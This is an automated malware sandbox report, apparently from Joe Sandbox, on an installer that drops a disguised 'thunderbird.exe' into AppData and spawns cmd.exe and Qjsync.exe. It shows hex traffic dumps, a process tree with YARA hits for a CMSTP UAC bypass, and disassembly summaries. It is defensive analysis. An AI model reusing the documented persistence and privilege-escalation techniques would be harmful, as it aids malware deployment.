0d 01 08 84 5b b8 78 4a f3 94 96 94 d2 c2 de d0 84 ce e4 ce da 09 8b 0b 14 Data Ascii: PS+SBqZ<fN?psEnRQH+[xJXPe7.!pp[xJ.U.[xJXPq[xJ
2024-12-02 06:26:10 UTC	1369	IN	Data Raw: 50 de d0 c4 c6 fc c6 c4 c4 c8 50 d4 c6 e0 c6 d4 c4 c8 f5 04 39 08 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd f5 04 08 ac 6c 80 1f 56 49 90 33 b0 c2 5c e8 6d e9 34 15 81 06 26 0d 14 00 09 00 05 05 11 14 0a 19 b5 b5 bd 81 06 08 84 5b b8 78 4a f3 94 96 58 50 ca d2 e8 e8 e6 ec e4 5b 09 57 00 10 00 04 00 05 05 11 14 0a 19 d2 d2 c0 5b 09 04 db 43 fa 4d f0 6c 1d df 0f 01 fe 07 14 00 05 00 05 05 11 14 0a 19 b5 b5 e7 0f 01 08 84 5b b8 78 4a f3 94 96 58 50 d4 c4 c8 30 0a 2d 01 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 30 0a 04 27 ef 2a e6 0c c0 cd 74 1b 0f 2a 09 14 00 0c 00 05 05 11 14 0a 19 b5 b5 da 1b 0f 08 84 5b b8 78 4a f3 94 96 ea c6 e8 e0 de ca c6 50 ca d2 d0 c0 87 06 ea 08 14 00 08 00 05 05 11 14 0a 19 e9 e9 da 87 06 08 97 84 3f b5 7b e0 fb 48 8f 2a e3 42 40 40 5f Data Ascii: PP9lVI3\m4&[xJXP[W[CMl[xJXP0-0't[xJP?{H*B@@_
2024-12-02 06:26:10 UTC	1369	IN	Data Raw: 00 04 00 05 05 11 14 0a 19 d2 d2 bd cb 04 04 83 0e de d8 a8 21 39 4a d2 03 fa 06 14 00 0b 00 05 05 11 14 0a 19 b5 b5 f6 d2 03 08 84 5b b8 78 4a f3 94 96 9e d0 ea e4 ce d4 d4 ac ce e4 dc be 07 1c 00 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 be 07 04 85 aa 1c 0b af 64 0e 9c 0b 00 02 07 14 00 07 00 05 05 11 14 0a 19 b5 b5 e7 0b 00 08 84 5b b8 78 4a f3 94 96 9c de ea e4 d2 e8 fe 01 02 04 06 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 01 02 04 17 8a 78 9f 3d 44 6a 08 59 0b ba 0b 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 59 0b 08 e5 54 3d f0 b3 7e e5 41 f8 fa e1 07 88 de 41 67 38 02 6d 05 14 00 08 00 05 05 11 14 0a 19 e9 e9 fd 38 02 08 7e c9 1e 3f da ba e5 5b 66 67 c2 c8 e1 1a 41 7d 86 0b 67 06 10 00 04 00 05 05 11 14 0a 19 d2 d2 da 86 0b 04 43 6a e8 2a 68 45 0f b8 66 0b Data Ascii: !9J[xJd[xJx=DjYYT=~AAg8m8~?[fgA}gCj*hEf
2024-12-02 06:26:10 UTC	1369	IN	Data Raw: 11 14 0a 19 b5 b5 d5 b5 0e 08 84 5b b8 78 4a f3 94 96 d6 c6 ea ea c6 d0 c2 c6 e8 ea b4 a4 c6 d4 c6 c2 e8 ce d6 b4 84 c6 ea da e4 d2 ec b4 e4 c4 ce e4 ce 77 0d a2 07 14 00 08 00 05 05 11 14 0a 19 e9 e9 da 77 0d 08 59 31 41 30 45 15 fa 07 40 9f 9d c7 7e b5 5e 21 19 09 52 06 14 00 48 00 05 05 11 14 0a 19 b5 b5 c0 19 09 08 84 5b b8 78 4a f3 94 96 e2 ce d4 d4 c6 e4 ea b4 98 ce fc fc 94 de c8 c6 e8 e4 fe b4 ca d2 d6 50 d4 de c8 c6 e8 e4 fe 50 d8 ce fc fc b4 9e d0 c4 c6 fc c6 c4 84 88 b4 c0 de d4 c6 b2 b2 6c 50 de d0 c4 c6 fc c6 c4 c4 c8 50 d4 c6 e0 c6 d4 c4 c8 d6 0b c9 01 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd d6 0b 08 9d 40 f4 8a 7a 17 9f 89 81 ee 28 7d 41 b7 3b af ed 04 a2 0a 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 ed 04 04 03 d7 4b c1 29 19 59 56 61 0a 19 03 Data Ascii: [xJwwY1A0E@~^!RH[xJPPlPP@z(}A;K)YVa
2024-12-02 06:26:10 UTC	1369	IN	Data Raw: d2 d2 e7 fe 03 04 4b 8c 47 24 61 42 55 b3 98 01 ce 04 14 00 1e 00 05 05 11 14 0a 19 b5 b5 d5 98 01 08 84 5b b8 78 4a f3 94 96 d6 c6 ea ea c6 d0 c2 c6 e8 ea b4 84 de ea ca d2 e8 c4 b4 84 c6 e0 c6 d4 d2 ec d6 c6 d0 e4 9b 02 cd 0c 10 00 04 00 05 05 11 14 0a 19 d2 d2 bd 9b 02 04 52 1c 61 18 78 37 86 8a 4e 0b 8e 05 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 4e 0b 08 67 e3 db 33 84 1e 18 02 7a 4d 07 c4 bf be bc 24 04 04 b9 08 10 00 04 00 05 05 11 14 0a 19 d2 d2 da 04 04 04 97 40 bd 37 bc 6f 5a a5 8a 0d 6a 08 14 00 1f 00 05 05 11 14 0a 19 b5 b5 ca 8a 0d 08 84 5b b8 78 4a f3 94 96 c0 e4 ec b4 80 de d4 c6 b8 de d4 d4 ce b4 e8 c6 ca c6 d0 e4 ea c6 e8 e0 c6 e8 ea 50 fc d6 d4 74 0d 88 05 14 00 12 00 05 05 11 14 0a 19 b5 b5 c0 74 0d 08 84 5b b8 78 4a f3 94 96 8e e8 d6 d2 Data Ascii: KG$aBU[xJRax7NNg3zM$@7oZj[xJPtt[xJ
2024-12-02 06:26:10 UTC	1369	IN	Data Raw: 05 05 11 14 0a 19 b5 b5 da 0f 06 08 84 5b b8 78 4a f3 94 96 e6 ea c6 e8 50 ca d2 d0 c0 5a 01 dd 00 14 00 08 00 05 05 11 14 0a 19 e9 e9 e7 5a 01 08 f1 67 87 8d 07 4e 4e 48 ed c9 5b 7a 3c ee ea 6e 69 0f d2 09 14 00 08 00 05 05 11 14 0a 19 b5 b5 c0 69 0f 08 84 5b b8 78 4a f3 94 96 c8 d4 da c4 ce e4 ce 58 f0 03 d3 04 14 00 0b 00 05 05 11 14 0a 19 b5 b5 f6 f0 03 08 84 5b b8 78 4a f3 94 96 58 ea e4 c6 ce d6 58 50 c6 fc c6 34 0a 77 03 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 34 0a 08 59 86 ea 88 7e 40 e3 ae 45 28 36 7f 45 e0 47 88 ec 0a 59 05 10 00 04 00 05 05 11 14 0a 19 d2 d2 c0 ec 0a 04 da 48 c7 5c f0 67 20 ce 78 0b 67 03 14 00 22 00 05 05 11 14 0a 19 b5 b5 d5 78 0b 08 84 5b b8 78 4a f3 94 96 d6 c6 ea ea c6 d0 c2 c6 e8 ea b4 84 de ea ca d2 e8 c4 b4 84 c6 e0 c6 Data Ascii: [xJPZZgNNH[z<nii[xJX[xJXXP4w4Y~@E(6EGYH\g xg"x[xJ
2024-12-02 06:26:11 UTC	1369	IN	Data Raw: 08 84 5b b8 78 4a f3 94 96 58 50 d4 d2 c2 51 06 22 0b 14 00 08 00 05 05 11 14 0a 19 e9 e9 fd 51 06 08 35 ea 48 47 79 39 b8 bd 2c 44 94 b0 42 99 1c 9b 66 03 2e 06 10 00 04 00 05 05 11 14 0a 19 d2 d2 d5 66 03 04 f8 87 5e b6 d2 ac b9 24 85 01 0b 06 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 85 01 04 2c f5 aa 2b 02 da 4d b9 f7 0e cd 04 14 00 1b 00 05 05 11 14 0a 19 b5 b5 c0 f7 0e 08 84 5b b8 78 4a f3 94 96 aa d2 c0 e4 e2 ce e8 c6 b4 88 de e4 ca d2 de d0 b4 88 de e4 ca d2 de d0 56 ae e4 fb 0e d3 0e 14 00 15 00 05 05 11 14 0a 19 b5 b5 fd fb 0e 08 84 5b b8 78 4a f3 94 96 e0 d0 ca b4 a8 c6 ce d4 a0 90 8a b4 c4 ce e4 ce 50 d8 ea d2 d0 a9 02 90 01 14 00 05 00 05 05 11 14 0a 19 b5 b5 bd a9 02 08 84 5b b8 78 4a f3 94 96 58 50 d6 ea c0 0c 0c a1 0e 10 00 04 00 05 05 11 14 Data Ascii: [xJXPQ"Q5HGy9,DBf.f^$,+M[xJV[xJP[xJXP

Target ID:	0
Start time:	01:24:04
Start date:	02/12/2024
Path:	C:\Users\user\Desktop\UolJwovI8c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UolJwovI8c.exe"
Imagebase:	0x590000
File size:	10'750'445 bytes
MD5 hash:	B0AD260D058A7F4F299B4BBC7F876799
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:24:05
Start date:	02/12/2024
Path:	C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{0F54F10E-6020-4B59-907E-73F350F6C1A3}\.cr\UolJwovI8c.exe" -burn.clean.room="C:\Users\user\Desktop\UolJwovI8c.exe" -burn.filehandle.attached=684 -burn.filehandle.self=512
Imagebase:	0x510000
File size:	10'636'628 bytes
MD5 hash:	5DEBD32329500518D4F21225DCB64E43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:24:05
Start date:	02/12/2024
Path:	C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{F45F8542-2D1F-4FB1-B66C-A4C0420B90F3}\.ba\thunderbird.exe"
Imagebase:	0x400000
File size:	8'504'936 bytes
MD5 hash:	A9D830B99ABEA315C465A440C4AA1B94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2266985552.0000000003E3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:24:16
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Imagebase:	0x400000
File size:	8'504'936 bytes
MD5 hash:	A9D830B99ABEA315C465A440C4AA1B94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2423574647.0000000003EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:24:27
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:24:27
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:24:49
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Qjsync.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Qjsync.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:25:04
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe"
Imagebase:	0x400000
File size:	8'504'936 bytes
MD5 hash:	A9D830B99ABEA315C465A440C4AA1B94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2906490239.0000000003E1D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:25:15
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2963541112.0000000003460000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2963866860.00000000053D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:25:15
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:25:26
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe"
Imagebase:	0x400000
File size:	8'504'936 bytes
MD5 hash:	A9D830B99ABEA315C465A440C4AA1B94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.3125872527.0000000003EB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:25:37
Start date:	02/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.3289498939.0000000005753000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:25:37
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	01:25:51
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Qjsync.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Qjsync.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.3401936989.00000000026AB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 00593CC4 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 320
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00593D40
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00593D53
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00593D9E
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00593DA8
GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00593DF6
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00593E00
FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00593E53
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00593E64
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00593F3E
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00593F52
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00593F79
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00593F9C
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00593FB5
FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00593FC5
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00593FDA
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00594009
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0059402B
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0059404D
RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00594064
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 0059406E
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00594095
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 005940B0
FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 005940E6

Strings

dirutil.cpp, xrefs: 00593D76, 00593FFA
DEL, xrefs: 00593F6D
*.*, xrefs: 00593E2C
4#v, xrefs: 00593DF6

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: 4#v$*.*$DEL$dirutil.cpp
API String ID: 1544372074-4118715877
Opcode ID: 48b383385a5a4eeb72a5324516a1a377152018d14da26308ab96afbda89481a2
Instruction ID: dd4340b2df69e449bfd6b951933ada5ae71655cef2facf4b6773e9138a58155c
Opcode Fuzzy Hash: 48b383385a5a4eeb72a5324516a1a377152018d14da26308ab96afbda89481a2
Instruction Fuzzy Hash: 22B1D972D01239DBDF305A648C09F9ABE79BF50750F010296EE08FB190D7769E95DE90

Function 00595195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00595217

Part of subcall function 005D04F8: InitializeCriticalSection.KERNEL32(005FB5FC,?,00595223,00000000,?,?,?,?,?,?), ref: 005D050F

Part of subcall function 0059120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0059523F,00000000,?), ref: 00591248
Part of subcall function 0059120A: GetLastError.KERNEL32(?,?,?,0059523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00591252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00595285

Part of subcall function 005D0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 005D0E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00595317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00595321
CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0059558E

Strings

3.11.1.2318, xrefs: 00595384
Failed to run RunOnce mode., xrefs: 0059541C
user.cpp, xrefs: 00595345
Failed to get OS info., xrefs: 0059534F
Failed to run untrusted mode., xrefs: 005954B6
Failed to run per-machine mode., xrefs: 0059546C
Failed to run per-user mode., xrefs: 00595494
Failed to initialize core., xrefs: 005953C3
Failed to initialize user state., xrefs: 0059526C
Invalid run mode., xrefs: 005953F9
Failed to initialize Wiutil., xrefs: 005952E1
Failed to initialize XML util., xrefs: 005952F9
Failed to initialize Regutil., xrefs: 005952C9
Failed to initialize COM., xrefs: 00595291
Failed to run embedded mode., xrefs: 00595444
Failed to initialize Cryputil., xrefs: 005952A6
Failed to parse command line., xrefs: 00595245

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$user.cpp
API String ID: 3262001429-510904028
Opcode ID: 02dca8d924c4191788a8b66f34e339befe09c3eec061e967976af770501d956d
Instruction ID: acdc6a14a06b4360e33c7dacef90b01ff1281b5ed564cc4ccf2ddb643be2255c
Opcode Fuzzy Hash: 02dca8d924c4191788a8b66f34e339befe09c3eec061e967976af770501d956d
Instruction Fuzzy Hash: E7B19571D4162A9BDF33AF64CC4ABED7EA5BF44710F050196F908A6241EB309EA0DF91

Function 005D304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,005D3609,00000000,?,00000000), ref: 005D3069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,005BC025,?,00595405,?,00000000,?), ref: 005D3075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 005D30B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005D30C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 005D30CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005D30D6
CoCreateInstance.OLE32(005FB6B8,00000000,00000001,005DB818,?,?,?,?,?,?,?,?,?,?,?,005BC025), ref: 005D3111
ExitProcess.KERNEL32 ref: 005D31C0

Strings

xmlutil.cpp, xrefs: 005D3099
Wow64RevertWow64FsRedirection, xrefs: 005D30CE
IsWow64Process, xrefs: 005D30AF
kernel32.dll, xrefs: 005D3059
Wow64DisableWow64FsRedirection, xrefs: 005D30BB
Wow64EnableWow64FsRedirection, xrefs: 005D30C3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: 936b20861783bd961e27f3759bf8e74377f56583099b554c3975ad4df4e91eac
Instruction ID: d62567f4967c771c59f919dac111fc53c90442e32f95d796fce8f868fc93204c
Opcode Fuzzy Hash: 936b20861783bd961e27f3759bf8e74377f56583099b554c3975ad4df4e91eac
Instruction Fuzzy Hash: CC418D35A01216ABDB309BACC849AAEBFA4BF44710F11406BE901EB350DB75DF00DB91

Function 00591070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005933C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,005910DD,?,00000000), ref: 005933E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 005910F6

Part of subcall function 00591175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0059111A,cabinet.dll,00000009,?,?,00000000), ref: 00591186
Part of subcall function 00591175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0059111A,cabinet.dll,00000009,?,?,00000000), ref: 00591191
Part of subcall function 00591175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0059119F
Part of subcall function 00591175: GetLastError.KERNEL32(?,?,?,?,?,0059111A,cabinet.dll,00000009,?,?,00000000), ref: 005911BA
Part of subcall function 00591175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005911C2
Part of subcall function 00591175: GetLastError.KERNEL32(?,?,?,?,?,0059111A,cabinet.dll,00000009,?,?,00000000), ref: 005911D7

CloseHandle.KERNELBASE(?,?,?,?,005DB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00591131

Strings

msi.dll, xrefs: 005910A0
clbcatq.dll, xrefs: 005910BC
comres.dll, xrefs: 005910B5
version.dll, xrefs: 005910A7
feclient.dll, xrefs: 005910D1
msasn1.dll, xrefs: 005910C3
cabinet.dll, xrefs: 00591099, 00591114
crypt32.dll, xrefs: 005910CA
wininet.dll, xrefs: 005910AE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: f795d671d4dd6ab4adf416573ac22be3e4b6fe5cdfa04123e8ccf831badc4d44
